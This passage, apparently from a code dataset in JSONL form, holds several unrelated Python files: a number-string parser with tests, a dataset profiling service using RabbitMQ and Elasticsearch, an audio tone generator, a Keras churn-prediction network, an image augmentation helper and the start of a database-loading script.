3.7+i\nnum = r\"([+-]?)(\\d+\\.\\d+|\\d+\\.?|\\.\\d+)(e[+-]?\\d+)?\"\nC3 = r\"^%s([+-][ij])$\" % num\n\n# True complex numbers: (x,y)\nC4 = r\"^\\(%s(,)%s\\)$\" % (num, num)\ndel num\n\n# Regular expressions\nimag1 = re.compile(I1, re.X | re.I)\nimag2 = re.compile(I2, re.X | re.I)\nreal = re.compile(R, re.X | re.I)\ncomplex1 = re.compile(C1, re.X | re.I)\ncomplex2 = re.compile(C2, re.X | re.I)\ncomplex3 = re.compile(C3, re.X | re.I)\ncomplex4 = re.compile(C4, re.X | re.I)\n\n# Rationals: \"a/b\", and \"axb/c\" forms are allowed where a and b are\n# integers and x is one or more of the following characters: '+- '. \n# b and c are always positive; a may be positive or negative.\nRa = r'''\n ^ # Mixed fraction\n ([-+])? # Optional sign\n (\\d+) # Integer \n [-+ ]+ # Separation character\n (\\d+) # Numerator\n / # Fraction separator\n (\\d+) # Denominator\n $\n | # Or\n ^ # Canonical fraction\n ([-+]?\\d+) # Integer a with optional sign\n / # Fraction separator\n (\\d+) # Denominator\n $\n'''\nrational = re.compile(Ra, re.X | re.I)\n\nclass Number(object):\n '''Used to generate a number object from a string.\n '''\n\n # If the following class variable is nonzero, then integers are\n # being restricted to a said number of bits.\n bits = 0\n\n # If signed is True, then integer arithmetic is signed; otherwise,\n # arithmetic is unsigned.\n signed = True\n\n def __init__(self):\n pass\n\n def __call__(self, s):\n assert len(s) > 0\n suffix = 1\n if s != \"now\" and s != \"today\":\n if len(s) > 1 and s[:2] != \"0x\":\n if s[-1] in suffixes_ln:\n exponent = suffixes_ln[s[-1]]\n if exponent >= 0:\n suffix = Zn(10**exponent)\n else:\n suffix = mpf(\"1e\" + str(exponent))\n s = s[:-1]\n for func in (self.j, self.i, self.q, self.v, self.r, self.c):\n x = func(s)\n if x != None: \n if suffix == 1:\n return x\n if isint(x):\n if isint(suffix): return Zn(suffix*x)\n else: return suffix*mpf(int(x))\n elif isinstance(x, Rational):\n if isint(suffix): return Rational(suffix*x.n, x.d)\n else: return suffix*x.mpf()\n elif isinstance(x, mpf) or \\\n isinstance(x, mpc) or \\\n isinstance(x, mpi):\n if isint(suffix): return mpf(int(suffix))*x\n else: return suffix*x\n else:\n return None\n return None\n\n def j(self, s):\n '''Check to see if it's a Julian date/time form. We only allow\n two forms: 'dS[y[:...]]' where S is a string for the month or\n '.+:.+' (regexp syntax) where it contains a colon and means a \n time today. 'now' and 'today' are also allowed.\n '''\n if s == \"now\" or s == \"today\" or \":\" in s:\n return Julian(s)\n sl = s.lower()\n for month in Julian.month_names:\n if month.lower() in sl:\n return Julian(s)\n return None\n\n def i(self, s):\n # Handle special cases like 0x, 0o, and 0b\n try:\n value = 0\n match = False\n if len(s) > 2:\n if s[:2] == \"0x\":\n value = int(s[2:], 16)\n match = True\n elif s[:2] == \"0o\":\n value = int(s[2:], 8)\n match = True\n elif s[:2] == \"0b\":\n value = int(s[2:], 2)\n match = True\n if integer.match(s):\n return Zn(int(s))\n if match:\n return Zn(value)\n except ValueError:\n pass\n except Exception:\n raise\n return None\n\n def q(self, s):\n mo = rational.match(s)\n if mo:\n g = [i for i in mo.groups() if i]\n sign = \"\"\n if g[0] == \"+\":\n del g[0]\n elif g[0] == \"-\":\n sign = \"-\"\n del g[0]\n try:\n num = [int(i) for i in g]\n except:\n raise Exception(\"Bug: rational match on non-integer\")\n if not num:\n return None\n elif len(num) == 2:\n w, n, d = 0, num[0], num[1]\n elif len(num) == 3:\n w, n, d = num\n else:\n msg = \"Program bug\\nUnexpected number of matches on\\n\"\n msg += \"'%s'\" % s\n raise Exception(msg)\n n = int(sign + str(w*d + n))\n return Rational(n, d)\n else:\n return None\n\n def r(self, s):\n # Handle infinities\n if s == \"inf\": return inf\n if s == \"-inf\": return -inf\n # If the number begins with \"E\" or 'e', prepend a 1\n if s[0] == \"E\" or s[0] == \"e\":\n s = \"1\" + s\n mo = real.match(s)\n if mo:\n num = [i for i in mo.groups() if i]\n if not num:\n return None\n else:\n try:\n return mpf(''.join(num))\n except:\n return None\n else:\n return None\n\n def c(self, s):\n s = s.lower()\n s = s.replace(\"j\", \"i\")\n if \"i\" not in s and \"(\" not in s:\n return None\n if s == \"i\" or s == \"+i\":\n return mpc(0, 1)\n if s == \"-i\":\n return mpc(0, -1)\n mo = complex3.match(s)\n if mo:\n n = ''.join([i for i in mo.groups() if i])\n try:\n ending = n[-2:]\n if ending == \"+i\":\n return mpc(mpf(n[:-2]), 1)\n elif ending == \"-i\":\n return mpc(mpf(n[:-2]), -1)\n else:\n raise Exception(\"Program bug: unexpected complex number\")\n except:\n pass\n for expression in (imag1, imag2):\n mo = expression.match(s)\n if mo:\n num = [i for i in mo.groups() if i]\n if num:\n try:\n return mpc(0, mpf(''.join(num)))\n except:\n return None\n else:\n return None\n for expression in (complex1, complex2):\n mo = expression.match(s)\n if mo:\n try:\n g = mo.groups()\n r = mpf(''.join([i for i in g[:3] if i]))\n i = mpf(''.join([i for i in g[3:] if i]))\n return mpc(r, i)\n except:\n return None\n mo = complex4.match(s)\n if mo:\n try:\n s = \"\".join([i for i in mo.groups() if i])\n r, i = [mpf(i) for i in s.split(\",\")]\n return mpc(r, i)\n except:\n return None\n\n def v(self, s):\n '''Interval numbers: allowed forms are\n 1. 'a +- b'\n 2. 'a (b%)' % sign is optional\n 3. '[a, b]'\n In 1, a is the midpoint of the interval and b is the half-width.\n In 2, a is the midpoint of the interval and b is the half-width.\n In 3, the interval is indicated directly.\n '''\n e = ValueError(\"Improperly formed interval number '%s'\" %s)\n s = s.replace(\" \", \"\")\n if \"+-\" in s:\n n = [mpf(strip(i)) for i in s.split(\"+-\")]\n return mpi(n[0] - n[1], n[0] + n[1])\n elif \"(\" in s:\n if s[0] == \"(\": # Don't confuse with a complex number (x,y)\n return None\n if \")\" not in s:\n raise e\n s = s.replace(\")\", \"\")\n percent = False\n if \"%\" in s:\n if s[-1] != \"%\":\n raise e\n percent = True\n s = s.replace(\"%\", \"\")\n a, p = [mpf(strip(i)) for i in s.split(\"(\")]\n d = p\n if percent:\n d = a*p/mpf(100)\n return mpi(a - d, a + d)\n elif \",\" in s:\n if \"[\" not in s: raise e\n if \"]\" not in s: raise e\n s = s.replace(\"[\", \"\")\n s = s.replace(\"]\", \"\")\n n = [mpf(strip(i)) for i in s.split(\",\")]\n return mpi(n[0], n[1])\n else:\n return None\n\nif __name__ == \"__main__\":\n # Test cases\n nums = {\n # Integers\n Zn(0) : (\n \"0\", \"+0\", \"-0\", \"000\", \"+000\", \"-000\", \n ),\n Zn(1) : (\n \"1\", \"+1\", \"01\", \"+01\", \"001\", \"+001\", \n ),\n Zn(-1) : (\n \"-1\", \"-01\", \"-001\",\n ),\n Zn(124) : (\n \"124\", \"+124\", \"0124\", \"+0124\", \"000124\", \"+000124\",\n ),\n Zn(-123) : (\n \"-123\", \"-000123\",\n ),\n\n # Reals\n mpf(0) : (\n \"0.0\", \"+0.0\", \"-0.0\",\n \"000.000\", \"+000.000\", \"-000.000\",\n ),\n mpf(1) : (\n \"1.\", \"+1.\", \"1.0\", \"+1.0\", \n \"1.0e0\", \"+1.0e0\",\n \"1.0E0\", \"+1.0E0\",\n ),\n mpf(-2) : (\n \"-2.\", \"-2.0\", \"-2.0e0\", \"-2.0000E000\",\n ),\n mpf(\"-2.3\") : (\n \"-2.3\", \"-2.30\", \"-2.3000\", \"-2.3e0\", \"-2300e-3\", \"-0.0023e3\",\n \"-.23E1\",\n ),\n mpf(\"2.345e-7\") : (\n \"2.345e-7\", \"2345e-10\", \"0.00000002345E+1\", \"0.0000002345\",\n ),\n\n # Pure imaginaries\n mpc(0, 1) : (\n \"i\", \"+i\", \"1i\", \"+1i\", \"+i1\",\n \"1.i\", \"+1.i\", \"+i1.\",\n \"1.0i\", \"+1.0i\", \"+i1.0\",\n \"1.00i\", \"+1.00i\", \"+i1.00\",\n ),\n mpc(0, -1) : (\n \"-i\", \"-i\", \"-1i\", \"-i1\",\n \"-1.i\", \"-1.i\", \"-i1.\",\n \"-1.0i\", \"-1.0i\", \"-i1.0\",\n \"-1.00i\", \"-1.00i\", \"-i1.00\",\n ),\n mpc(0, 3) : (\n \"3i\", \"+3i\", \"3.i\", \"+3.i\", \"3.0i\", \"+3.0i\", \"3.0e0i\", \"+3.0e0i\",\n \"I3\", \"+I3\", \"I3.\", \"+I3.\", \"I3.0\", \"+I3.0\", \"I3.0e0\", \"+I3.0e0\",\n \"3.000i\", \"i3.000\", \"3.000E0i\", \"i3.000E0\",\n \"3.000e-0J\", \"J3.000e-0\", \"3.000e+0J\", \"J3.000e+0\",\n ),\n mpc(0, -8) : (\n \"-8i\", \"-8.i\", \"-8.0i\", \"-8.0e0i\",\n \"-j8\", \"-j8.\", \"-j8.0\", \"-j8.0E0\",\n ),\n mpc(0, mpf(\"-0.123\")) : (\n \"-.123i\", \"-.123j\", \"-0.123i\", \"-1.23e-1i\",\n ),\n\n # Complex numbers\n mpc(1, -1) : (\n \"1-1i\", \"1-1.i\", \"1.-1i\", \"1.-1.i\",\n \"1-j1\", \"1-j1.\", \"1.-j1\", \"1.-j1.\",\n \"1.00-1.00I\", \"1.00-I1.00\", \"1000e-3-100000e-5I\",\n \"1.00-J1.00\", \"1000E-3-J100000E-5\",\n ),\n mpc(1, 1) : (\n \"1+1i\", \"1+1.i\", \"1.+1i\", \"1.+1.i\",\n \"1+i\", \"1.0+i\", \"1.000+i\", \n ),\n mpc(\"4.9\", -1) : (\n \"4.9-1i\", \"4.9-1.i\", \"49e-1-1i\",\n \"4.9-i\", \"49e-1-i\",\n ),\n mpc(\"-7\", -1) : (\n \"-7-1i\", \"-7-1.i\", \"-70e-1-1i\",\n \"-7-i\", \"-70e-1-i\",\n ),\n mpc(mpf(\"11.549e-59\"), mpf(\"-8.31e89\")) : (\n \"11.549e-59-8.31e89I\", \"1.1549e-58-J831e87\",\n ),\n mpc(1, 2): (\n \"(1,2)\", \"(1.,2.)\", \"(1.0,2.0)\", \"(1.000,2.000)\",\n ),\n\n # Rational numbers\n Rational(3, 8) : (\n \"3/8\", \"6/16\", \"0 12/32\", \"0-15/40\", \"0+18/48\",\n ),\n Rational(-3, 7) : (\n \"-3/7\", \"-6/14\", \"-0 12/28\", \"-0-15/35\", \"-0+18/42\",\n ),\n Rational(3, -7) : (\n \"-3/7\", \"-6/14\", \"-0 12/28\", \"-0-15/35\", \"-0+18/42\",\n ),\n }\n # Because of a bug in mpi == and != tests, we have to test them\n # differently.\n mpi_tests = {\n # Interval numbers\n mpi(1, 3) : (\n \"[1, 3]\", \"[1.0, 3]\", \"[1, 3.0]\", \"[1.0, 3.0]\",\n \"[1,3]\", \"[1.0,3]\", \"[1,3.0]\", \"[1.0,3.0]\",\n \"[ 1, 3]\", \"[ 1.0,3]\", \"[ 1, 3.0]\",\n \"1.5 +- 0.5\", \"1.5+-0.5\", \"1.5+- 0.5\", \"1.5 +-0.5\", \n \"1.5 +- 0.5\", \"15e-1 +- 500e-3\", \n \"1.5(33.33333333333333333333%)\", \"1.5 (33.33333333333333333333%)\",\n \"1.5 ( 33.33333333333333333333%)\",\n \"1.5 ( 33.33333333333333333333 % )\",\n \"1.5( 33.33333333333333333333 % )\",\n \"1.5(33.33333333333333333333 % )\",\n ),\n }\n\n n = Number()\n status = 0\n for number in nums:\n for numstr in nums[number]:\n num = n(numstr)\n if num != number:\n print(\"Error for '%s'\" % numstr)\n print(\" Should be %s\" % str(number))\n print(\" Got %s\" % str(num))\n status += 1\n for number in mpi_tests:\n for numstr in mpi_tests[number]:\n num = n(numstr)\n if (num.a != number.a) and (num.b != number.b):\n print(\"Error for '%s'\" % numstr)\n print(\" Should be %s\" % str(number))\n print(\" Got %s\" % str(num))\n status += 1\n exit(status)\n","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":16005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504263888","text":"import aio_pika\nimport asyncio\nimport contextlib\nimport csv\nfrom datetime import datetime\nimport elasticsearch\nimport itertools\nimport lazo_index_service\nimport logging\nimport os\nimport prometheus_client\nimport threading\nimport time\nimport xlrd\n\nfrom datamart_core.common import setup_logging, add_dataset_to_index, \\\n delete_dataset_from_index, log_future, json2msg, msg2json\nfrom datamart_core.materialize import get_dataset\nfrom datamart_materialize import DatasetTooBig\nfrom datamart_materialize.excel import xls_to_csv\nfrom datamart_materialize.pivot import pivot_table\nfrom datamart_materialize.tsv import tsv_to_csv\nfrom datamart_profiler import process_dataset, parse_date\n\n\nlogger = logging.getLogger(__name__)\n\n\nMAX_CONCURRENT_PROFILE = 1\nMAX_CONCURRENT_DOWNLOAD = 2\n\n\nPROM_DOWNLOADING = prometheus_client.Gauge(\n 'profile_downloading_count', \"Number of datasets currently downloading\",\n)\nPROM_PROFILING = prometheus_client.Gauge(\n 'profile_profiling_count', \"Number of datasets currently profiling\",\n)\n\n\n@contextlib.contextmanager\ndef prom_incremented(metric, amount=1):\n \"\"\"Context manager that increments a metric, then decrements it at the end.\n \"\"\"\n metric.inc(amount)\n try:\n yield\n finally:\n metric.dec(amount)\n\n\ndef materialize_and_process_dataset(\n dataset_id, metadata,\n lazo_client, nominatim,\n profile_semaphore,\n cache_invalid=False,\n):\n with contextlib.ExitStack() as stack:\n with prom_incremented(PROM_DOWNLOADING):\n dataset_path = stack.enter_context(\n get_dataset(metadata, dataset_id, cache_invalid=cache_invalid)\n )\n materialize = metadata.pop('materialize')\n\n # Check for Excel file format\n try:\n xlrd.open_workbook(dataset_path)\n except xlrd.XLRDError:\n pass\n else:\n logger.info(\"This is an Excel file\")\n materialize.setdefault('convert', []).append({'identifier': 'xls'})\n excel_temp_path = dataset_path + '.xls'\n os.rename(dataset_path, excel_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n xls_to_csv(excel_temp_path, dst)\n finally:\n os.remove(excel_temp_path)\n\n # Check for TSV file format\n with open(dataset_path, 'r') as fp:\n try:\n dialect = csv.Sniffer().sniff(fp.read(16384))\n except Exception as error: # csv.Error, UnicodeDecodeError\n logger.error(\"csv.Sniffer error: %s\", error)\n dialect = csv.get_dialect('excel')\n if getattr(dialect, 'delimiter', '') == '\\t':\n logger.info(\"This is a TSV file\")\n materialize.setdefault('convert', []).append({'identifier': 'tsv'})\n tsv_temp_path = dataset_path + '.tsv'\n os.rename(dataset_path, tsv_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n tsv_to_csv(tsv_temp_path, dst)\n finally:\n os.remove(tsv_temp_path)\n\n # Check for pivoted temporal table\n with open(dataset_path, 'r') as fp:\n reader = csv.reader(fp)\n try:\n columns = next(iter(reader))\n except StopIteration:\n columns = []\n if len(columns) >= 3:\n non_matches = [\n i for i, name in enumerate(columns)\n if parse_date(name) is None\n ]\n if len(non_matches) <= max(2.0, 0.20 * len(columns)):\n logger.info(\"Detected pivoted table\")\n materialize.setdefault('convert', []).append({\n 'identifier': 'pivot',\n 'except_columns': non_matches,\n })\n pivot_temp_path = dataset_path + '.pivot.csv'\n os.rename(dataset_path, pivot_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n pivot_table(pivot_temp_path, dst, non_matches)\n finally:\n os.remove(pivot_temp_path)\n\n # Profile\n with profile_semaphore:\n with prom_incremented(PROM_PROFILING):\n logger.info(\"Profiling dataset %r\", dataset_id)\n start = time.perf_counter()\n metadata = process_dataset(\n data=dataset_path,\n dataset_id=dataset_id,\n metadata=metadata,\n lazo_client=lazo_client,\n nominatim=nominatim,\n include_sample=True,\n coverage=True,\n plots=True,\n )\n logger.info(\n \"Profiling dataset %r took %.2fs\",\n dataset_id,\n time.perf_counter() - start,\n )\n\n metadata['materialize'] = materialize\n return metadata\n\n\nclass Profiler(object):\n def __init__(self):\n self.profile_semaphore = threading.Semaphore(MAX_CONCURRENT_PROFILE)\n self.es = elasticsearch.Elasticsearch(\n os.environ['ELASTICSEARCH_HOSTS'].split(',')\n )\n self.lazo_client = lazo_index_service.LazoIndexClient(\n host=os.environ['LAZO_SERVER_HOST'],\n port=int(os.environ['LAZO_SERVER_PORT'])\n )\n self.nominatim = os.environ['NOMINATIM_URL']\n self.channel = None\n\n self.loop = asyncio.get_event_loop()\n log_future(self.loop.create_task(self._run()), logger,\n should_never_exit=True)\n\n # Retry a few times, in case the Elasticsearch container is not yet up\n for i in itertools.count():\n try:\n if not self.es.indices.exists('datamart'):\n raise RuntimeError(\"'datamart' index does not exist\")\n except Exception:\n logger.warning(\"Can't connect to Elasticsearch, retrying...\")\n if i == 5:\n raise\n else:\n time.sleep(5)\n else:\n break\n\n async def _amqp_setup(self):\n # Setup the datasets exchange\n self.datasets_exchange = await self.channel.declare_exchange(\n 'datasets',\n aio_pika.ExchangeType.TOPIC)\n\n # Setup the profiling exchange\n self.profile_exchange = await self.channel.declare_exchange(\n 'profile',\n aio_pika.ExchangeType.FANOUT,\n )\n\n # Declare the profiling queue\n self.profile_queue = await self.channel.declare_queue(\n 'profile',\n arguments={'x-max-priority': 3},\n )\n await self.profile_queue.bind(self.profile_exchange)\n\n # Declare the failed queue\n self.failed_queue = await self.channel.declare_queue('failed_profile')\n\n async def _run(self):\n connection = await aio_pika.connect_robust(\n host=os.environ['AMQP_HOST'],\n port=int(os.environ['AMQP_PORT']),\n login=os.environ['AMQP_USER'],\n password=os.environ['AMQP_PASSWORD'],\n )\n self.channel = await connection.channel()\n await self.channel.set_qos(prefetch_count=MAX_CONCURRENT_DOWNLOAD)\n\n await self._amqp_setup()\n\n # Consume profiling queue\n async for message in self.profile_queue:\n obj = msg2json(message)\n dataset_id = obj['id']\n metadata = obj['metadata']\n materialize = metadata.get('materialize', {})\n\n logger.info(\"Processing dataset %r from %r\",\n dataset_id, materialize.get('identifier'))\n\n # Compare materialization info with stored to know whether cache\n # should be ignored\n try:\n hit = self.es.get('datamart', dataset_id)\n except elasticsearch.NotFoundError:\n cache_invalid = True\n else:\n cache_invalid = materialize != hit['_source']['materialize']\n\n future = self.loop.run_in_executor(\n None,\n materialize_and_process_dataset,\n dataset_id,\n metadata,\n self.lazo_client,\n self.nominatim,\n self.profile_semaphore,\n cache_invalid,\n )\n\n future.add_done_callback(\n self.process_dataset_callback(\n message, dataset_id,\n )\n )\n\n def process_dataset_callback(self, message, dataset_id):\n async def coro(future):\n metadata = msg2json(message)['metadata']\n try:\n try:\n metadata = future.result()\n if metadata['nb_rows'] == 0:\n logger.info(\n \"Dataset has no rows, not inserting into index: \" +\n \"%r\",\n dataset_id,\n )\n delete_dataset_from_index(\n self.es,\n dataset_id,\n # DO delete from Lazo\n self.lazo_client,\n )\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Dataset has no rows\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n else:\n # Delete dataset if already exists in index\n delete_dataset_from_index(\n self.es,\n dataset_id,\n # Don't delete from Lazo, we inserted during profile\n None,\n )\n # Insert results in Elasticsearch\n body = dict(metadata,\n date=datetime.utcnow().isoformat() + 'Z',\n version=os.environ['DATAMART_VERSION'])\n add_dataset_to_index(self.es, dataset_id, body)\n\n # Publish to RabbitMQ\n await self.datasets_exchange.publish(\n json2msg(dict(body, id=dataset_id)),\n dataset_id,\n )\n\n # Remove from alternate index\n try:\n self.es.delete('pending', dataset_id)\n except elasticsearch.NotFoundError:\n pass\n except DatasetTooBig:\n # Materializer reached size limit\n logger.info(\"Dataset over size limit: %r\", dataset_id)\n message.ack()\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Dataset is too big\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n except Exception as e:\n if isinstance(e, elasticsearch.RequestError):\n # This is a problem with our computed metadata\n logger.exception(\n \"Error inserting dataset %r in Elasticsearch\",\n dataset_id,\n )\n elif isinstance(e, elasticsearch.TransportError):\n # This is probably an issue with Elasticsearch\n # We'll log, nack and retry\n raise\n else:\n logger.exception(\"Error processing dataset %r\",\n dataset_id)\n # Move message to failed queue\n await self.channel.default_exchange.publish(\n aio_pika.Message(message.body),\n self.failed_queue.name,\n )\n # Ack anyway, retrying would probably fail again\n message.ack()\n\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Error profiling dataset\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n else:\n message.ack()\n logger.info(\"Dataset %r processed successfully\",\n dataset_id)\n except Exception:\n message.nack()\n raise\n\n def callback(future):\n log_future(self.loop.create_task(coro(future)), logger)\n\n return callback\n\n\ndef main():\n setup_logging()\n prometheus_client.start_http_server(8000)\n logger.info(\"Startup: profiler %s\", os.environ['DATAMART_VERSION'])\n Profiler()\n asyncio.get_event_loop().run_forever()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"profiler/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":14025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"410401710","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.signal as sc\nimport simpleaudio as sa\n\n# Candida de veces que se repite la señal\nCANTIDAD=10\n\nf = 6000\nfs = 44100\nsec = 1 # Cuantos segundos se quiere reproducir\nB = 5000\nt = np.arange(0,sec,1/fs)\n\n#note = (2**15-1)*np.sin(2 * np.pi * B/2*(t/sec) *t) #sweept\n\n#steps=10\n#note=np.array([])\n#for i in range(steps):\n# note=np.append(note,[(2**15-1)*np.sin(2 * np.pi * B*(i/steps) *t)])\n\n#note = (2**15-1)*np.sin(2 * np.pi * B * t) # Señal senoidal a reproducir\n#note = (2**15-1)*sc.sawtooth(2 * np.pi * f * t) # Señal triangular a reproducir\nnote = (2**15-1)*sc.square(2 * np.pi * f * t) # Señal cuadrada a reproducir\n\n# Grafica la señal\nfig=plt.figure(1)\nplt.plot(t,note)\n##plt.plot(t[0:5*fs//f],note[:5*fs//f])\nplt.show()\n\naudio = note.astype(np.int16) #tranforma la variable note a entero de 16bits y lo guarda en audio\nfor i in range(CANTIDAD):\n play_obj = sa.play_buffer(audio, 1, 2, fs) # sale el audio\n play_obj.wait_done() # espera que termine la linea anterior\n\n","sub_path":"Programas/TP2/linux/audio_gen.py","file_name":"audio_gen.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388761212","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 18 10:21:03 2017\n\n@author: Nott\n\"\"\"\n\n#Artificial Neural Network\n\n#Installing Theano\n#pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n#Installing Tenserflow\n#pip install --upgrade tensorflow\n\n#Install Keras\n#pip install --upgrade keras\n\n#Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n \n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\nonehotencoder = OneHotEncoder(categorical_features = [1])\nX = onehotencoder.fit_transform(X).toarray()\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#Part 2 - Let's make ANN\n\n#Import Keras Libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#Initialising ANN\nclassifier = Sequential()\n\n#Adding the Input layer and First hidden layers\nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n\n#Adding Second Hidden Layer\nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n\n#Adding Output Layer if dependencies param > 2 change output_dim=x and activation=softmax\nclassifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n\n#Part 3 - Make Prediction and Evaluating the model if dependencies param > 2 change loss='categorical_crossentropy'\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Fitting ANN to the Training set\nclassifier.fit(X_train, y_train, batch_size=10 ,epochs=100)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n#Predict new single test\nnew_prediction = classifier.predict(sc.transform(np.array([[0.0,0,600,1,40,3,60000,2,1,1,50000]])))\nnew_prediction = (new_prediction > 0.5)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n\n#Evaluating ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_classifier():\n classifier = Sequential()\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n classifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier, batch_size = 10, epochs = 100)\naccuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\nmean = accuracies.mean()\nvariance = accuracies.std()\n\n\n#Improving ANN\n\n#Dropout Regularrizaion to Reduce overfitting if it needed\n\n#Tuning ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_classifier(localOptimizer):\n classifier = Sequential()\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n classifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n classifier.compile(optimizer= localOptimizer, loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier)\nparameters = {'batch_size' : [25, 32],\n 'epochs' : [100, 500],\n 'localOptimizer' : ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 10)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_parameters = grid_search.best_params_\nbeat_accuracy = grid_search.best_score_\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Part 8 - Deep Learning/Section 39 - Artificial Neural Networks (ANN)/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"343435761","text":"import tensorflow as tf\n\n\ndef image_augmentation(image, is_training, crop_h, crop_w):\n\n def _aug_with_train(input_x, crop_height, crop_width):\n img_h, img_w, ch = list(map(int, input_x.get_shape()[:]))\n\n pad_w = int(img_h * 0.2)\n pad_h = int(img_w * 0.2)\n\n input_x = tf.image.resize_image_with_crop_or_pad(input_x, img_h+pad_h, img_w+pad_w)\n input_x = tf.random_crop(input_x, [crop_height, crop_width, ch])\n input_x = tf.image.random_flip_left_right(input_x)\n input_x = tf.image.random_flip_up_down(input_x)\n\n input_x = tf.image.random_contrast(input_x, lower=0.2, upper=2.0)\n input_x = tf.image.random_brightness(input_x, max_delta=63. / 255.)\n input_x = tf.image.random_saturation(input_x, lower=0.5, upper=1.8)\n input_x = tf.image.per_image_standardization(input_x)\n return input_x\n\n def _aug_with_test(input_x, crop_height, crop_width):\n\n input_x = tf.image.resize_image_with_crop_or_pad(input_x, crop_height, crop_width)\n input_x = tf.image.per_image_standardization(input_x)\n return input_x\n\n image = tf.cond(is_training,\n lambda: _aug_with_train(image, crop_h, crop_w),\n lambda: _aug_with_test(image, crop_h, crop_w))\n return image\n\n\ndef images_augmentation(images, phase_train):\n with tf.name_scope('augmentation'):\n crop_h, crop_w = list(map(int, images.get_shape()[1:3]))\n images = tf.map_fn(lambda image: image_augmentation(image, phase_train, crop_h, crop_w),\n images)\n return images\n","sub_path":"augmentator.py","file_name":"augmentator.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300584480","text":"# -*- coding: utf-8 -*-\n\"\"\"\ndata2database\n Load and transfer logsheet, subject dimensions, digitized, and force data\n to database.\n\nThis code will also create a table that records the table names of each cycle.\n\nCreated on Mon Jul 6 08:51:24 2020\n\n@author: cwiens\n\"\"\"\n\nimport sqlite3\nimport pandas as pd\nimport glob, os\n\nfrom codes.importlogsheet import readls\n\n\n\"\"\" set file names \"\"\"\ndb = '../data/wc_graded.sqlite'\nlogsheet = '../data/logsheet_master.xlsx'\nsub_dim_file = '../data/Subject Body Dimensions_Complete2.xlsx'\nwc_adj_file = 